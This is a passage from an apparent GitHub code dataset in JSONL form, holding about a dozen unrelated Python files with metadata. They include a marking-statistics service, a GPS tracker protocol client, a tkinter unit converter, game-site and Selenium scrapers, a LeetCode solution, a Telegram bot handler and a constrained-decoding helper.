total_marking_time_data[user][key]\n\n if total_marking_time is None:\n total_marking_time = 0\n\n average_marking_time = round(\n total_marking_time / count if count > 0 else 0\n )\n\n grouped_by_user[user][key] = {\n \"annotations_count\": count,\n \"average_marking_time\": self.seconds_to_humanize_time(\n average_marking_time\n ),\n \"percentage_marked\": int(\n (\n count\n / self.get_marking_task_count_based_on_question_number_and_version(\n question=key[0], version=key[1]\n )\n )\n * 100\n ),\n \"date_format\": arrow.utcnow()\n .shift(seconds=average_marking_time)\n .format(\"YYYYMMDDHHmmss\"),\n }\n\n return grouped_by_user\n\n def get_annotations_based_on_question_number_version(\n self,\n grouped_by_user_annotations: Dict[\n str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]\n ],\n ) -> Dict[Tuple[int, int], Dict[str, list]]:\n \"\"\"Group annotations by question number and version.\n\n Args:\n grouped_by_user_annotations: (Dict[str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]])\n A dictionary with users as keys, and nested dictionaries as values containing the count\n of annotations and average marking time for each (question_number, question_version)\n combination.\n\n Returns:\n Dict[Tuple[int, int], Dict[str, list]]: A dictionary containing annotations grouped by\n question numbers and versions, with marker information and other data.\n \"\"\"\n grouped_by_question: Dict[Tuple[int, int], Dict[str, list]] = dict()\n\n for marker, annotation_data in grouped_by_user_annotations.items():\n for question, question_data in annotation_data.items():\n if question not in grouped_by_question:\n grouped_by_question[question] = {\n \"annotations\": [],\n }\n grouped_by_question[question][\"annotations\"].append(\n {\n \"marker\": marker,\n \"annotations_count\": question_data[\"annotations_count\"],\n \"average_marking_time\": question_data[\"average_marking_time\"],\n \"percentage_marked\": question_data[\"percentage_marked\"],\n \"date_format\": question_data[\"date_format\"],\n }\n )\n\n return grouped_by_question\n\n def seconds_to_humanize_time(self, seconds: float) -> str:\n \"\"\"Convert the given 
number of seconds to a human-readable time string.\n\n Args:\n seconds: the number of seconds, unsigned so no distinction\n is made between past and future.\n\n Returns:\n A human-readable time string.\n \"\"\"\n if seconds > 9:\n return arrow.utcnow().shift(seconds=seconds).humanize(only_distance=True)\n else:\n return (\n arrow.utcnow()\n .shift(seconds=seconds)\n .humanize(only_distance=True, granularity=[\"second\"])\n )\n\n @transaction.atomic\n def get_marking_task_count_based_on_question_number_and_version(\n self, question: int, version: int\n ) -> int:\n \"\"\"Get the count of MarkingTasks based on the given question number and version.\n\n Args:\n question: (int) The question number.\n version: (int) The question version.\n\n Returns:\n int: The count of MarkingTask for the specific question number and version.\n \"\"\"\n return MarkingTask.objects.filter(\n question_number=question, question_version=version\n ).count()\n\n @transaction.atomic\n def filter_annotations_by_time_delta_seconds(\n self, time_delta_seconds: int\n ) -> QuerySet[Annotation]:\n \"\"\"Filter annotations by time in seconds.\n\n Args:\n time_delta_seconds: (int) Number of seconds.\n\n Returns:\n QuerySet: Filtered queryset of annotations.\n \"\"\"\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n\n if time_delta_seconds == 0:\n return annotations\n else:\n time_interval_start = timezone.now() - timedelta(seconds=time_delta_seconds)\n return annotations.filter(time_of_last_update__gte=time_interval_start)\n\n @transaction.atomic\n def get_time_of_latest_updated_annotation(self) -> str:\n \"\"\"Get the human readable time of the latest updated annotation.\n\n Returns:\n Human-readable time of the latest updated annotation or\n the string ``\"never\"`` if there have not been any annotations.\n \"\"\"\n try:\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n latest_annotation = annotations.latest(\"time_of_last_update\")\n except ObjectDoesNotExist:\n return \"never\"\n return arrow.get(latest_annotation.time_of_last_update).humanize()\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Progress/services/userinfo_service.py","file_name":"userinfo_service.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"22897145897","text":"fileName=\"\"\"\nLANG: PYTHON3\nTASK: friday\n\"\"\".split()[-1]\n\nfin = open('%s.in' % fileName) \nN = int(fin.readline().strip())\n\nrslt = [0, 0, 0, 0, 0, 0, 0]\ndays = 13 - 31\nfor year in range(1900, 1900+N):\n for month in range(12):\n if month in (0,1,3,5,7,8,10):\n days += 31\n elif month in (4,6,9,11):\n days += 30\n else:\n days += 28\n if year % 400 == 0 or year % 4 == 0 and year % 100 > 0:\n days += 1\n rslt[ (days+1) % 7 ] += 1\n\nwith open('%s.out' % fileName, 'w') as fout:\n fout.write( '%s\\n' % ' '.join(map(str,rslt)) )\n","repo_name":"back/USACO","sub_path":"Gateway 1.2/friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28482438539","text":"from functools import wraps\nfrom itertools import chain, cycle\nfrom logging import getLogger\nfrom socket import create_connection\nimport struct\nfrom threading import Semaphore\nfrom uuid import uuid4\n\nfrom wialond.util import binary\nfrom wialond.util.crc16 import calc_crc16\nfrom 
wialond.util.concurrency import AsyncResult, Event, spawn\n\nlogger = getLogger(__name__)\n\n\nclass ConnectionClosedError(ConnectionError):\n pass\n\n\ndef _io_operation(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except ConnectionError:\n self.close()\n raise\n return wrapper\n\n\nclass Connection:\n\n def __init__(self, addr):\n self._socket = create_connection(addr)\n self._reader = self._socket.makefile(mode='rb')\n self._acks = {}\n self._message_counter = cycle(range(1 << 16))\n self._closed = Event()\n self._write_mutex = Semaphore()\n self._listen_thread = spawn(self._listen)\n\n @property\n def active(self):\n return not self._closed.is_set()\n\n def wait_for_close(self, *args, **kwargs):\n return self._closed.wait(*args, **kwargs)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.close()\n self._listen_thread.join()\n\n def send_login(self, mac):\n mac = '{mac}\\0'.format(mac=mac).encode()\n payload = struct.pack('!BB{}s'.format(len(mac)), 1, 64, mac)\n return self._send_message(0, binary.pack_var(len(payload), 2) + payload)\n\n def send_picture(self, timestamp, data):\n index = binary.pack_var(0, 1)\n return self._send_data(\n timestamp,\n b''.join([\n binary.pack_var(3, 1),\n index,\n binary.pack_var(len(data), 2),\n index,\n '{}\\0'.format(uuid4().hex).encode(),\n data,\n ])\n )\n\n def send_position(self, timestamp, position):\n lat, lon, speed, course, height, stats, hdop = position\n return self._send_data(\n timestamp,\n struct.pack(\n '!BIIHHHBH',\n 1, int(lat * 1000000), int(lon * 1000000),\n int(speed), int(course),\n int(height), stats, int(hdop)\n ),\n )\n\n def send_keep_alive(self):\n return self._send_message(2)\n\n def _send_data(self, timestamp, data):\n payload = struct.pack('!IB{}s'.format(len(data)), timestamp, 1, data)\n return self._send_message(1, binary.pack_var(len(payload), 2) + payload)\n\n def _send_message(self, msg_type, payload=b''):\n seq = next(self._message_counter)\n async_result = AsyncResult()\n self._acks[seq] = async_result\n body = b''.join([\n binary.pack_uint[2](0x2424),\n binary.pack_var(msg_type, 1),\n binary.pack_uint[2](seq),\n payload,\n ])\n if msg_type != 2:\n body += binary.pack_uint[2](calc_crc16(body))\n self.write(body)\n return async_result\n\n @_io_operation\n def read(self, size=-1):\n data = self._reader.read(size)\n if size > 0 and not data:\n raise ConnectionClosedError\n return data\n\n @_io_operation\n def readline(self, size=-1):\n data = self._reader.readline(size)\n if size > 0 and not data:\n raise ConnectionClosedError\n return data\n\n @_io_operation\n def write(self, b):\n with self._write_mutex:\n return self._socket.sendall(b)\n\n def close(self):\n self._closed.set()\n self._socket.close()\n self._reader.close()\n while self._acks:\n _, async_result = self._acks.popitem()\n async_result.set_error(ConnectionClosedError)\n\n def _listen(self):\n try:\n while self.active:\n self._handle_message()\n except ConnectionClosedError:\n pass\n except Exception:\n logger.error(\"Connection listen failure\", exc_info=1)\n self.close()\n\n def _handle_message(self):\n header_buf = self.read(3)\n head, code = struct.unpack('!HB', header_buf)\n assert head == 0x4040, str([head, code])\n if code == 255:\n self._handle_command(header_buf)\n elif 0 <= code <= 4:\n self._handle_ack(code)\n else:\n raise ValueError(\"Invalid code value: {}\".format(code))\n\n def _handle_ack(self, code):\n (seq,) = struct.unpack('!H', self.read(2))\n 
async_result = self._acks.pop(seq, None)\n if async_result is None:\n return\n if code == 0:\n async_result.set_result(True)\n else:\n async_result.set_error(Exception(code))\n\n def _handle_command(self, header_buf):\n size, size_buf = binary.read_var_with_buf(self, 2)\n timestamp_buf = self.read(4)\n binary.unpack_uint[4](timestamp_buf) # ignored timestamp\n cmd_type, cmd_type_buf = binary.read_var_with_buf(self, 1)\n assert cmd_type == 0\n data = self.readline()\n crc16 = binary.read_uint[2](self)\n calced_crc16 = calc_crc16(\n chain(header_buf, size_buf, timestamp_buf, cmd_type_buf, data)\n )\n if crc16 != calced_crc16:\n raise ValueError(\"Invalid crc16: {} != {}\".format(crc16, calced_crc16))\n","repo_name":"frostoov/wialond","sub_path":"wialond/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8044865124","text":"from tkinter import *\nfrom tkinter import ttk\n\ndef print_hierarchy(w, depth = 0):\n print(\n ' ' * depth + w.winfo_class()\n + ' w=' + str(w.winfo_width()) + \" h=\" + str(w.winfo_height())\n + ' x=' + str(w.winfo_x()) + ' y=' + str(w.winfo_y())\n )\n for chw in w.winfo_children():\n print_hierarchy(chw, depth+1)\n\nclass FeetToMeters:\n def __init__(self, root):\n root.title(\"Feet to Meters Calculator\")\n self.mainframe = ttk.Frame(root, padding=\"50 30 50 30\")\n self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # MVC - Model\n self.feet = StringVar() # input model\n self.meters = StringVar() # output model\n\n self.feet_entry = ttk.Entry(self.mainframe, width=7, textvariable=self.feet) # bind model to view\n self.feet_entry.grid(column=1, row=1, columnspan=2, rowspan=1, sticky=(W, E))\n\n meter_label = ttk.Label(self.mainframe, textvariable=self.meters) # bind model to view\n meter_label.grid(column=2, row=2, sticky=(W, E))\n\n ttk.Label(self.mainframe, text=\"is equivalent to\").grid(column=1, row=2, sticky=(E))\n ttk.Label(self.mainframe, text=\"feet\").grid(column=3, row=1, sticky=(W))\n ttk.Label(self.mainframe, text=\"meters\").grid(column=3, row=2, sticky=(W))\n\n # bind Control function - Observer pattern\n ttk.Button(self.mainframe, text=\"Calculate\", command=self.calculate).grid(column=3, row=3, sticky=(W))\n for child in self.mainframe.winfo_children():\n child.grid_configure(padx=15, pady=15)\n\n self.feet_entry.focus()\n # Observer: View -> Controller\n root.bind(\"<Return>\", self.calculate)\n\n def calculate(self, *args):\n try:\n value = float(self.feet.get())\n self.meters.set(int(0.3048 * value *1000.0 + 0.5) / 1000.0)\n except ValueError:\n pass\n\n\nif __name__ == '__main__':\n root = Tk()\n FeetToMeters(root)\n print_hierarchy(root)\n root.mainloop()","repo_name":"iproduct/intro-python","sub_path":"08-tkinter-lab/02_example_class.py","file_name":"02_example_class.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"12819956751","text":"import logging\n\nlogger = logging.getLogger()\n\nformatter = logging.Formatter('%(process)d %(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n\nstream_handler = 
logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\nlogger.setLevel(logging.INFO)","repo_name":"tristantr/projet7","sub_path":"grandpy/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12740397141","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom game.items import HotGameItem\nimport re\nimport requests\nimport json\n\n\n# 一周热榜\nclass HotgameSpider(scrapy.Spider):\n name = 'hotgame'\n allowed_domains = ['17173.com']\n start_urls = ['http://top.17173.com/list-2-0-0-0-0-0-0-0-0-0-1.html']\n page = 1\n\n def parse(self, response):\n if self.page <= 36:\n self.page += 1\n next_url = 'http://top.17173.com/list-2-0-0-0-0-0-0-0-0-0-' + str(self.page) + '.html'\n game_list = response.xpath('//ul[@class=\"list-plate js-rank\"]//li')\n for game_info in game_list:\n game_title = game_info.xpath('.//div[@class=\"con\"]/a/text()').extract_first()\n detail_url = game_info.xpath('.//div[@class=\"con\"]/a/@href').extract_first()\n test_status = game_info.xpath('.//div[@class=\"c5\"]/text()').extract_first().strip()\n game_id = re.findall('\\d+', detail_url)[1]\n yield scrapy.Request(detail_url, callback=self.parse_detail, meta={'game_id': game_id})\n yield scrapy.Request(next_url, callback=self.parse)\n\n def parse_detail(self, response):\n game_id = response.meta['game_id']\n print('游戏热榜详情')\n # 图片链接\n img_url = response.xpath('//span[@class=\"avatar-t\"]//span/img/@href').extract_first()\n # 游戏名称\n title = response.xpath('//h1/text()').extract_first()\n # 评星\n star = response.xpath('//div[@class=\"mod-mater-info\"]/div/text()').extract_first().strip('')\n # 风格\n style = ''\n for item in response.xpath('//div[@class=\"box-mater-cate\"]//a'):\n style += item.xpath('./text()').extract_first() + ','\n # 游戏类型\n game_type = response.xpath('//ul[@class=\"list-mater-info\"]//li[1]//a/text()').extract_first()\n # 游戏语言\n game_language = response.xpath('//ul[@class=\"list-mater-info\"]//li[2]//a/text()').extract_first()\n # 是否收费\n is_free = response.xpath('//ul[@class=\"list-mater-info\"]//li[3]//span[2]/text()').extract_first().strip()\n # 支持平台\n item_plat = response.xpath('//ul[@class=\"list-mater-info\"]//li[4]//a/@title').extract_first()\n # 开发商\n kaifashang = response.xpath('//ul[@class=\"list-mater-info\"]//li[5]//a/text()').extract_first()\n # 注册网址\n register_url = response.xpath('//ul[@class=\"list-mater-info\"]//li[6]//span[2]/text()').extract_first()\n # 运营商\n item_operator = response.xpath('//ul[@class=\"list-mater-info\"]//li[7]//span[2]//a/@title').extract_first()\n # 简介\n content = response.xpath('//div[@class=\"mod-mater-intro\"]/p/text()').extract_first().strip()\n print('-' * 200)\n item = HotGameItem()\n item['img_url'] = img_url\n item['title'] = title\n item['star'] = star\n item['style'] = style\n item['game_type'] = game_type\n item['game_language'] = game_language\n item['is_free'] = is_free\n item['item_plat'] = item_plat\n item['kaifashang'] = kaifashang\n item['register_url'] = register_url\n item['item_operator'] = item_operator\n item['content'] = content\n\n # 福利通知我的接口\n fuli_url = 'http://hao.17173.com/api/getGameScheCount?game_codes=' + str(\n game_id) + ' & callback=jsonp & callback=jQuery111105772122356899088_1532679883818 & _=1532679883819'\n response = requests.get(fuli_url).text\n response = re.search('{.*?}.*?}', response).group()\n result_dict = json.loads(response)\n fuli = 
result_dict['data'][game_id + ' ']\n item['fuli'] = fuli\n # 投票数和排名\n rank_url = 'http://top.17173.com/api/gamerankinfo?gameCode=' + str(game_id) + '.js&_=1532680359400'\n response = requests.get(rank_url).text\n result = re.findall('{.*?}', response)[2]\n result_dict = json.loads(result)\n ranking = result_dict['rank_num']\n votes = result_dict['heats_num']\n item['votes'] = votes\n item['ranking'] = ranking\n yield item","repo_name":"panghupy/17173-","sub_path":"game/game/spiders/hotgame.py","file_name":"hotgame.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18751118748","text":"#!/usr/bin/env python3\n# https://leetcode.com/problems/insertion-sort-list/\n\nimport unittest\nfrom typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, following=None):\n self.val = val\n self.next = following\n\n\nclass Solution:\n def insertionSortList(\n self, head: Optional[ListNode]\n ) -> Optional[ListNode]:\n handle = ListNode(0)\n handle.next = head\n tail = handle\n while tail.next is not None:\n # Grab first node after the tail of already ordered nodes\n node = tail.next\n # Remove (extract) that node from the list\n tail.next = tail.next.next\n # Iterate from the node holding the head\n current = handle\n inserted = False\n # Iterate until we reach the node beyond the extracted node\n while current.next is not tail.next:\n # When a node with greater or equal value found\n # then insert extracted node before it\n if node.val <= current.next.val:\n node.next = current.next\n current.next = node\n inserted = True\n break\n # Move on to the next ordered node\n current = current.next\n # If the extracted node was not inserted then insert it\n # at the end of the ordered list\n if not inserted:\n node.next = tail.next\n current.next = node\n # The extracted node becomes the tail of the ordered list\n tail = node\n return handle.next\n\n\nclass TestCode(unittest.TestCase):\n def test_example(self):\n n1 = ListNode(1)\n n2 = ListNode(2)\n n3 = ListNode(3)\n n4 = ListNode(4)\n n5 = ListNode(5)\n n6 = ListNode(6)\n n6.next = n3\n n3.next = n4\n n4.next = n5\n n5.next = n2\n n2.next = n1\n result = Solution().insertionSortList(n6)\n self.assertEqual(n1, result)\n self.assertEqual(n2, n1.next)\n self.assertEqual(n3, n2.next)\n self.assertEqual(n4, n3.next)\n self.assertEqual(n5, n4.next)\n self.assertEqual(n6, n5.next)\n self.assertEqual(None, n6.next)\n\n def test_1_1(self):\n n1_a = ListNode(1)\n n1_b = ListNode(1)\n n1_a.next = n1_b\n result = Solution().insertionSortList(n1_a)\n self.assertEqual(n1_b, result)\n self.assertEqual(n1_a, n1_b.next)\n self.assertEqual(None, n1_a.next)\n","repo_name":"altermarkive/training","sub_path":"algorithms/code/leetcode/lc147_insertion_sort_list/lc147_insertion_sort_list.py","file_name":"lc147_insertion_sort_list.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27421128800","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\n\r\n# Set the URL of the page to download\r\nurl = \"https://www.classcentral.com/\"\r\n\r\n# Start a new instance of the Chrome driver\r\ndriver = webdriver.Chrome()\r\n\r\n# Load the page and wait for it to load completely\r\ndriver.get(url)\r\ntime.sleep(5)\r\n\r\n# Find the Courses button and hover over it\r\nbutton = 
driver.find_element(\"xpath\", '//*[@id=\"page-home\"]/div[1]/header/div[1]/nav/div[1]/button[2]')\r\nActionChains(driver).move_to_element(button).perform()\r\n\r\n# Wait for the dynamic content to load\r\ntime.sleep(2)\r\n\r\n# Get the HTML content of the loaded dynamic content\r\ndynamic_content = driver.find_element(\"xpath\", '//*[@id=\"page-home\"]/div[1]/header/div[1]/nav/div[1]/nav/div').get_attribute('innerHTML')\r\n\r\nActionChains(driver).move_by_offset(200, 10).perform()\r\n\r\n# Save the downloaded HTML to a file\r\nwith open('classcentral.html', 'w') as f:\r\n f.write(driver.page_source)\r\n f.write(dynamic_content)\r\n\r\n# Quit the driver\r\ndriver.quit()\r\n","repo_name":"HitenM/Automation-Scripts","sub_path":"scraper_script_selenium.py","file_name":"scraper_script_selenium.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8101330828","text":"from pyrogram import Client, Filters, StopPropagation, InlineKeyboardButton, InlineKeyboardMarkup\n\n\n@Client.on_message(Filters.command([\"help\"]),group=-2)\nasync def help(client, message):\n # return\n joinButton = InlineKeyboardMarkup([\n [InlineKeyboardButton(\"⚙ Developer ⚙\", url=\"https://t.me/Amani_m_h_d\")],\n [InlineKeyboardButton(\n \"💢 Other Bots 💢\", url=\"https://t.me/My_Test_botz\")]\n ])\n helptxt = f\"<b>Hai, Follow these Steps..</b> \\n\\n➠ Send Me Your Youtube Link And Select Desired Option To Be Uploaded To Telegram \\n\\n➠ Currently Only Supports Youtube Single (No playlist) Just Send Any Youtube Link \\n\\n<b>📜Quote : </b><code>കിടന്ന് അടി വയ്ക്കരുത് എല്ലാർക്കും ഉപയോഗിക്കാൻ പറ്റും😌</code>\"\n await message.reply_text(helptxt, reply_markup=joinButton)\n raise StopPropagation\n\n\n\n\n","repo_name":"MasterThalapathy/YouTube_Downloader_Bot","sub_path":"plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37341498932","text":"from services.user_service import UserService\nfrom models.result import Result\nfrom fastapi import APIRouter, Depends, Response, BackgroundTasks\nfrom services.mlflow_service import MLflowService\nfrom services.model_comment_service import ModelCommentService\nfrom services.user_photo_service import UserPhotoService\nfrom libs.email_lib import Email\nimport util.validation as Validation\nimport schemas.user as UserSchema\nimport schemas.model_comment as ModelCommentSchema\nimport middleware.auth as AuthMiddleware\n\nrouter = APIRouter()\n\n# Add comment\n@router.post('/models/{model_name}/comments', status_code=200)\ndef add_comment(model_name: str, model_comment: ModelCommentSchema.ModelCommentAdd, response: Response, background_tasks: BackgroundTasks, current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n model_comment.comment = Validation.trim_whitespaces(text=model_comment.comment)\n\n # Add comment\n result = ModelCommentService.add_comment(model_name=model_name, user_id=current_user.data.id, comment=model_comment.comment)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Send email if comment was not made by model's owner\n if model.data.tags['user_id'] is not None and model.data.tags['user_id'] 
!= current_user.data.username:\n try:\n # Get model owner's data\n model_owner = UserService.get_user_by_username(model.data.tags['user_id'])\n\n if model_owner.is_success():\n background_tasks.add_task(\n Email().send_new_model_comment_email,\n model_owner.data.email,\n model_owner.data.name,\n model_name,\n current_user.data.name,\n model_comment.comment\n )\n except:\n pass\n\n return result.to_dict()\n\n# Get comments\n@router.get('/models/{model_name}/comments', status_code=200)\ndef get_model_comments(model_name, response: Response, count_only: bool = False, page_number: int = 1, results_per_page: int = 10):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Get comments\n model_comments = ModelCommentService.get_model_comments(\n model_name=model_name,\n count_only=count_only,\n page_number=page_number,\n results_per_page=results_per_page\n )\n\n if model_comments.is_fail():\n response.status_code = model_comments.get_status_code()\n\n # Return results straight away when count_only equals True\n if count_only:\n return model_comments.to_dict()\n\n results = []\n\n # Get and format comments' data\n for model_comment in model_comments.data:\n # Get commenter\n user = UserService.get_user_by_id(model_comment.user_id)\n username: str = ''\n name: str = ''\n\n if user.is_success():\n username = user.data.username\n name = user.data.name\n user_photo = None\n\n try:\n user_photo = UserPhotoService.get_user_photo(username)\n except:\n user_photo = None\n\n # Format model comment\n model_comment_dict = ModelCommentSchema.ModelCommentList(\n id=model_comment.id,\n comment=model_comment.comment,\n model_name=model_comment.model_name,\n created_at=model_comment.created_at,\n username=username,\n name=name,\n user_photo=user_photo\n )\n\n results.append(model_comment_dict)\n\n return Result(\n Result.SUCCESS,\n model_comments.message,\n results\n ).to_dict()\n\n# Delete comment\n@router.delete('/models/{model_name}/comments/{comment_id}', status_code=200)\ndef delete_comment(model_name: str, comment_id: int, response: Response, current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Check if comment exists\n model_comment = ModelCommentService.get_comment(comment_id)\n\n if model_comment.is_fail():\n response.status_code = model_comment.get_status_code()\n return model_comment.to_dict()\n\n # Get commenter data\n commenter = UserService.get_user_by_id(model_comment.data.user_id)\n\n if commenter.is_fail():\n response.status_code = commenter.get_status_code()\n return commenter.to_dict()\n\n # Check if current user has permission to delete comment. 
Comment can only be deleted by commenter\n if commenter.data.username != current_user.data.username:\n result = Result(\n Result.FAIL,\n 'You do not have permissions to delete this comment',\n Result.UNAUTHORIZED\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n deleted_comment = ModelCommentService.delete_comment(comment_id)\n\n if deleted_comment.is_fail():\n response.status_code = deleted_comment.get_status_code()\n\n return deleted_comment.to_dict()\n","repo_name":"shippedbrain/shipped-brain-backend","sub_path":"api/src/routers/model_comments.py","file_name":"model_comments.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"112235356","text":"class BestStationChoice:\n edges = None\n statNodes = None\n statChoice = None\n\n cust_cnt = None\n charge_tm = None\n distof = None\n timeof = None\n def __init__(self, edges, statNodes, cust_cnt, charge_tm):\n self.edges, self.statNodes, self.cust_cnt, self.charge_tm = edges, statNodes, cust_cnt, charge_tm\n self.timeof = lambda x, y: self.edges.get_edge(x, y).spend_tm if x!=y else 0\n self.distof = lambda x, y: self.edges.get_edge(x, y).dist if x!=y else 0\n \n def get_station_choice(self):\n self.statChoice = list()\n for i in range(self.cust_cnt):\n print(i)\n self.statChoice.append(list())\n for j in range(self.cust_cnt):\n choice = (None, (None, None), None, None)\n for stat in self.statNodes:\n dist_pre = self.distof(i, stat.id)\n dist_nxt = self.distof(stat.id, j)\n time = self.timeof(i, stat.id) + self.charge_tm + self.timeof(stat.id, j)\n if(choice[0] == None or dist_pre + dist_nxt < choice[1][0] + choice[1][1]):\n choice = (stat.id, (dist_pre, dist_nxt), time, stat)\n self.statChoice[i].append(choice)\n return self.statChoice\n\nclass Stations:\n choiceInfo = None\n cust_cnt = None\n inputFile = None\n def __init__(self, cust_cnt, fileName):\n self.cust_cnt = cust_cnt\n self.inputFile = open(fileName, \"r\")\n\n def read_best_choice(self):\n self.choiceInfo = list()\n\n data = self.inputFile.read()\n edges_str = data.split('\\n')\n for line in edges_str:\n if(line != ''):\n block = [int(x) for x in line.split(',')]\n self.choiceInfo.append((block[0], (block[1], block[2]), block[3]))\n return lambda x, y: self.choiceInfo[x * self.cust_cnt + y - 1]\n\n\ndef init_best_station(edges, statNodes, cust_cnt, charge_tm, outputFile):\n Choice = BestStationChoice(edges, statNodes, cust_cnt, charge_tm)\n statChoice = Choice.get_station_choice()\n for line in statChoice:\n string = \"\"\n for block in line:\n string += \"%d,%d,%d,%d\\n\" % (block[0], block[1][0], block[1][1], block[2])\n outputFile.write(string)\n\ndef get_best_station(cust_cnt, fileName):\n chargeChoice = Stations(cust_cnt, fileName)\n return chargeChoice.read_best_choice()","repo_name":"scPointer/MAA-VRPTW","sub_path":"tool/BestStation.py","file_name":"BestStation.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"42919407695","text":"def aniversariantes_de_setembro(lista):\n dict = {}\n i=0\n nomedata = lista.values()\n for k,v in lista.items():\n if v[3] == '0' and v[4] == '9':\n dict[k] = v\n i += 1\n return dict\n 
","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_328/ch76_2020_04_12_18_50_31_507612.py","file_name":"ch76_2020_04_12_18_50_31_507612.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8181390523","text":"from typing import Dict, List\n\nimport torch\nfrom genre.trie import Trie\n\nkeyword = ['select', 'distinct', 'from', 'join', 'on', 'where', 'group', 'by', 'order', 'asc', 'desc', 'limit',\n 'having',\n 'and', 'not', 'or', 'like', 'between', 'in',\n 'sum', 'count', 'max', 'min', 'avg',\n '(', ')', ',', '>', '<', '=', '>=', '!=', '<=',\n 'union', 'except', 'intersect',\n '1', '2', '3', '4', '5']\n\n\ndef get_end_to_end_prefix_allowed_tokens_fn_hf(\n model,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n return _get_end_to_end_prefix_allowed_tokens_fn(\n lambda x: model.tokenizer.encode(x),\n lambda x: model.tokenizer.decode(torch.tensor(x)),\n model.tokenizer.bos_token_id,\n model.tokenizer.pad_token_id,\n model.tokenizer.eos_token_id,\n len(model.tokenizer) - 1,\n sentences,\n start_mention_token,\n end_mention_token,\n start_entity_token,\n end_entity_token,\n mention_trie,\n candidates_trie,\n mention_to_candidates_dict,\n )\n\n\ndef get_end_to_end_prefix_allowed_tokens_fn_fairseq(\n model,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n return _get_end_to_end_prefix_allowed_tokens_fn(\n lambda x: model.encode(x).tolist(),\n lambda x: model.decode(torch.tensor(x)),\n model.model.decoder.dictionary.bos(),\n model.model.decoder.dictionary.pad(),\n model.model.decoder.dictionary.eos(),\n len(model.model.decoder.dictionary),\n sentences,\n start_mention_token,\n end_mention_token,\n start_entity_token,\n end_entity_token,\n mention_trie,\n candidates_trie,\n mention_to_candidates_dict,\n )\n\n\ndef _get_end_to_end_prefix_allowed_tokens_fn(\n encode_fn,\n decode_fn,\n bos_token_id,\n pad_token_id,\n eos_token_id,\n vocabulary_length,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n assert not (\n candidates_trie is not None and mention_to_candidates_dict is not None\n ), \"`candidates_trie` and `mention_to_candidates_dict` cannot be both != `None`\"\n\n codes = {}\n codes[\"EOS\"] = eos_token_id\n codes[\"BOS\"] = bos_token_id\n\n keyword_codes = {k: encode_fn(\" {}\".format(k))[1] for k in keyword}\n 